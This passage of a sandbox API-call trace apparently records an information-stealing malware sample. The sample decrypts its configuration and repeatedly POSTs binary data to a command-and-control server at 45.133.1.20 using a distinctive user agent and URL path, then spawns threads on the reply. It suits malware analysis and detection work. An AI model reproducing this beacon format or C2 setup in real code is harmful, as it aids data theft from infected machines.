(lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0268.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0268.947] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0268.947] GetProcessHeap () returned 0x6a0000 [0268.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0268.947] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0268.947] GetProcessHeap () returned 0x6a0000 [0268.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0268.947] socket (af=2, type=1, protocol=6) returned 0x968 [0268.948] connect (s=0x968, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0268.968] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0268.968] GetProcessHeap () returned 0x6a0000 [0268.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0268.969] GetProcessHeap () returned 0x6a0000 [0268.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0268.969] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0268.970] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0268.970] GetProcessHeap () returned 0x6a0000 [0268.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba830 [0268.970] GetProcessHeap () returned 0x6a0000 [0268.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0268.971] GetProcessHeap () returned 0x6a0000 [0268.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0268.971] GetProcessHeap () returned 0x6a0000 [0268.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0268.972] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0268.972] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0268.973] GetProcessHeap () returned 0x6a0000 [0268.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0268.973] GetProcessHeap () returned 0x6a0000 [0268.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0268.973] send (s=0x968, buf=0x6bd460*, len=242, flags=0) returned 242 [0268.973] send (s=0x968, buf=0x6bb998*, len=159, flags=0) returned 159 [0268.974] GetProcessHeap () returned 0x6a0000 [0268.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0268.974] recv (in: s=0x968, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0269.050] GetProcessHeap () returned 0x6a0000 [0269.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0269.052] GetProcessHeap () returned 0x6a0000 [0269.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0269.053] GetProcessHeap () returned 0x6a0000 [0269.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba830 | out: hHeap=0x6a0000) returned 1 [0269.053] GetProcessHeap () returned 0x6a0000 [0269.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0269.054] closesocket (s=0x968) returned 0 [0269.056] GetProcessHeap () returned 0x6a0000 [0269.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0269.056] GetProcessHeap () returned 0x6a0000 [0269.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0269.056] GetProcessHeap () returned 0x6a0000 [0269.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0269.057] GetProcessHeap () returned 0x6a0000 [0269.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0269.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16e8) returned 0x968 [0269.059] Sleep (dwMilliseconds=0xea60) [0269.061] GetProcessHeap () returned 0x6a0000 [0269.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0269.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.063] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.073] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0269.085] GetProcessHeap () returned 0x6a0000 [0269.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0269.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.086] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0269.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.087] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.089] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.089] GetProcessHeap () returned 0x6a0000 [0269.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0269.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.090] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0269.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.092] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0269.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.093] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0269.103] GetProcessHeap () returned 0x6a0000 [0269.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0269.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.105] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0269.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.106] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0269.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.107] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0269.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.108] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0269.108] GetProcessHeap () returned 0x6a0000 [0269.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0269.108] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0269.108] GetProcessHeap () returned 0x6a0000 [0269.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0269.109] GetProcessHeap () returned 0x6a0000 [0269.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0269.109] GetProcessHeap () returned 0x6a0000 [0269.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0269.110] GetProcessHeap () returned 0x6a0000 [0269.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0269.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.114] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.121] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0269.132] GetProcessHeap () returned 0x6a0000 [0269.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0269.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.134] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0269.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.136] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.137] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.137] GetProcessHeap () returned 0x6a0000 [0269.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0269.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.139] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0269.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.140] CryptDestroyKey (hKey=0x6ad020) returned 1 [0269.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.141] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0269.141] GetProcessHeap () returned 0x6a0000 [0269.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0269.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.142] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0269.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.143] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0269.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.174] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0269.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.176] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0269.176] GetProcessHeap () returned 0x6a0000 [0269.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0269.177] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0269.177] GetProcessHeap () returned 0x6a0000 [0269.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0269.177] socket (af=2, type=1, protocol=6) returned 0x96c [0269.177] connect (s=0x96c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0269.203] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0269.203] GetProcessHeap () returned 0x6a0000 [0269.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0269.203] GetProcessHeap () returned 0x6a0000 [0269.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0269.203] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0269.204] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0269.204] GetProcessHeap () returned 0x6a0000 [0269.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9e70 [0269.204] GetProcessHeap () returned 0x6a0000 [0269.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0269.205] GetProcessHeap () returned 0x6a0000 [0269.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0269.205] GetProcessHeap () returned 0x6a0000 [0269.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0269.206] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0269.206] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0269.206] GetProcessHeap () returned 0x6a0000 [0269.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0269.206] GetProcessHeap () returned 0x6a0000 [0269.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0269.207] send (s=0x96c, buf=0x6bd460*, len=242, flags=0) returned 242 [0269.208] send (s=0x96c, buf=0x6bb998*, len=159, flags=0) returned 159 [0269.208] GetProcessHeap () returned 0x6a0000 [0269.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0269.208] recv (in: s=0x96c, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0269.293] GetProcessHeap () returned 0x6a0000 [0269.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0269.293] GetProcessHeap () returned 0x6a0000 [0269.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0269.294] GetProcessHeap () returned 0x6a0000 [0269.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9e70 | out: hHeap=0x6a0000) returned 1 [0269.294] GetProcessHeap () returned 0x6a0000 [0269.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0269.295] closesocket (s=0x96c) returned 0 [0269.296] GetProcessHeap () returned 0x6a0000 [0269.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0269.296] GetProcessHeap () returned 0x6a0000 [0269.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0269.297] GetProcessHeap () returned 0x6a0000 [0269.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0269.297] GetProcessHeap () returned 0x6a0000 [0269.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0269.298] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16ec) returned 0x96c [0269.300] Sleep (dwMilliseconds=0xea60) [0269.301] GetProcessHeap () returned 0x6a0000 [0269.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0269.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.303] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.313] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0269.325] GetProcessHeap () returned 0x6a0000 [0269.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0269.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.327] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0269.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.328] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.329] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.329] GetProcessHeap () returned 0x6a0000 [0269.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0269.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.334] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0269.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.335] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0269.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.341] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0269.341] GetProcessHeap () returned 0x6a0000 [0269.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0269.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.342] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0269.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.344] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0269.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.345] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0269.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.346] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0269.346] GetProcessHeap () returned 0x6a0000 [0269.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0269.346] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0269.346] GetProcessHeap () returned 0x6a0000 [0269.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0269.347] GetProcessHeap () returned 0x6a0000 [0269.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0269.347] GetProcessHeap () returned 0x6a0000 [0269.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0269.348] GetProcessHeap () returned 0x6a0000 [0269.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0269.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.349] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.358] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0269.368] GetProcessHeap () returned 0x6a0000 [0269.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0269.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.370] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0269.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.371] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.373] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.373] GetProcessHeap () returned 0x6a0000 [0269.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0269.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.374] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0269.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.376] CryptDestroyKey (hKey=0x6ad020) returned 1 [0269.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0269.377] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0269.377] GetProcessHeap () returned 0x6a0000 [0269.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0269.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.378] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0269.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.379] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0269.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.381] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0269.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0269.382] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0269.382] GetProcessHeap () returned 0x6a0000 [0269.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0269.382] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0269.382] GetProcessHeap () returned 